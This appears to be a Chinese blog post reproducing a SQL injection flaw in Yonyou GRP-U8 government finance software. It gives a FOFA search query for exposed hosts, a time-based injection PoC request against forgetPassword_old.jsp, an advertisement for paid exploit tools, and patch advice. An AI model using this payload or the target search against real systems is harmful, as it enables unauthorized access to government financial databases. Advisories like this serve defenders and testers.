首页 > 数据库 >用友GRP-U8 forgetPassword_old.jsp SQL注入漏洞(QVD-2023-31085)

用友GRP-U8 forgetPassword_old.jsp SQL注入漏洞(QVD-2023-31085)

时间:2024-04-07 19:33:15浏览次数:24  
标签:forgetPassword old U8 GRP 漏洞 用友 星球

0x01 免责声明

请勿利用文章内的相关技术从事非法测试,由于传播、利用此文所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,作者不为此承担任何责任。工具来自网络,安全性自测,如有侵权请联系删除。本次测试仅供学习使用,如若非法他用,与平台和本文作者无关,需自行负责!!!

0x02 产品介绍

用友GRP-U8R10行政事业内控管理软件是用友公司专注于国家电子政务事业,基于云计算技术所推出的新一代产品,是我国行政事业财务领域最专业的政府财务管理软件。

0x03 漏洞威胁

用友GRP-U8R10产品官方在售及提供服务的版本为U8Manager,产品分B、C、G三个产品系列,以上受到本次该漏洞的影响。

0x04 漏洞环境

FOFA:

app="用友-GRP-U8"

0x05 漏洞复现

POC

GET /u8qx/forgetPassword_old.jsp?action=save&idCard=1&userName=1&inputDW=1&inputYWRQ=1%27;WAITFOR%20DELAY%20%270:0:5%27-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Accept-Encoding: gzip

延时5秒

0x06 批量验证脚本

Nuclei验证脚本已发布
知识星球:冷漠安全

0x07 修复建议

安装补丁

20231025-关于用友GRP-U8内控管理软件fоrɡеtPаѕѕԝоrd_old.јѕр存在SQL注入漏洞的解决方案

用友云盘:https://pan.yonyou.com/s/gUWlv8QkSsY密码:a61h

漏洞详情及批量检测POC工具请前往知识星球获取
知识星球:冷漠安全
交个朋友,限时优惠券:加入立减25

星球福利:每天更新最新漏洞POC、资料文献、内部工具等

标签:forgetPassword,old,U8,GRP,漏洞,用友,星球
From: https://blog.csdn.net/qq_39894062/article/details/137474834

相关文章

  • 用友U8ERP常见的清理锁定方法汇总
    用友U8ERP常见的清理锁定方法汇总注:涉及数据库处理的,请在专人指导下谨慎操作!1、制单时提示:当前选择的银行日记账被其他用户锁定,正在制单,不能再进行制单解决办法:清理异常、清除站点;如果都不行,数据库清理锁定:deletefromcn_lockacctbookwherecAuth<>'删除'---(根据条件删除)2......
  • 【爬虫】项目篇-在https://www.kanunu8.com/book2抓取电子书
    目录1)使用正则表达式2)使用bs41)使用正则表达式#使用requests库和正则表达式抓取在https://www.kanunu8.com/book3/任选的一本电子书importrequestsimportreimportosimporttimeheader={'user-agent':"Mozilla/5.0(WindowsNT10.0;Win64;x64)AppleWebKit......
  • EntityFramework Core Scaffolding
    EntityFrameworkCodeFirst是从代码生成数据库,叫做数据迁移。EntityFrameworkDatabaseFirst是从数据库生成代码,叫做脚手架(Scaffold)。本文介绍脚手架入门。用数据库图形界面(如SQLiteStudio)生成数据库模式,插入数据等,已经发展成熟,标准化了,非常直观,即使是生手也很容易掌握。......
  • 【漏洞复现】用友U8-Cloud FileServlet接口存在任意文件读取漏洞
    免责声明:文章来源互联网收集整理,文章仅供参考,此文所提供的信息只为网络安全人员对自己所负责的网站、服务器等(包括但不限于)进行检测或维护参考,未经授权请勿利用文章中的技术资料对任何计算机系统进行入侵操作。利用此文所提供的信息而造成的直接或间接后果和损失,均由使用者......
  • 【跳频通信】基于Gold码序列跳频通信附Matlab代码
     ✅作者简介:热爱科研的Matlab仿真开发者,修心和技术同步精进,代码获取、论文复现及科研仿真合作可私信。......
  • WPF如何使用 System.Windows.Forms.FolderBrowserDialog
    WPF如何使用System.Windows.Forms.FolderBrowserDialog在WPF中,如果你想使用System.Windows.Forms.FolderBrowserDialog来选择文件夹,你需要添加对WinForms的引用,因为FolderBrowserDialog是WindowsForms的一部分,不是WPF的一部分。下面是如何在WPF应用程序中使用FolderBro......
  • 一个命令搞定MP4文件转m3u8文件
    一个命令搞定MP4文件转m3u8文件直接将MP4文件转成m3u8:ffmpeg-idemo.mp4-hls_time10-hls_list_size0-hls_segment_filenameene_%05d.tsene.m3u8如果已经是ts文件了,则只需要执行下方命令即可:ffmpeg-idemo.ts-ccopy-map0-fsegment-segment_listplay......
  • U8二次开发CO-基于Net8调用COM对象
    以前没有碰过U8,只知道基于Net平台构建,本次业务需求是要把钉钉和U8打通,完成代办和消息提醒。网上搜索U8相关二开资料后发现,都是一些技术片段,零零碎碎的不成体系,也有可能是大客户都去U9或者Cloud了,老旧的8面临过气与替换(个人意见),遂边琢磨边做一些示例。开始介绍U8的CO二次开发模......
  • 渗透项目1-GoldenEye
    靶机地址:https://www.vulnhub.com/entry/goldeneye-1,240/靶机难度:中等(CTF)目标:得到root权限&找到flag.txt信息收集收集目标iparp-scan-l(收集本地网络中的活跃主机的IP地址和MAC地址。)kaliarp-scan网络扫描工具扫描局域网ip地址-阿里云开发者社区(aliyun.com)......
  • WPF实现placeholder效果
     概述:WPF中通过`Style`实现TextBox水印文本,使用`WatermarkTextBox`类及`ControlTemplate`。这个示例通过`VisualStateManager`在文本框失去焦点且内容为空时显示水印文本。通过`Watermark`属性简化水印文本设置,提高可维护性。在WPF中,通过Style实现TextBox中的水印文本(水印、......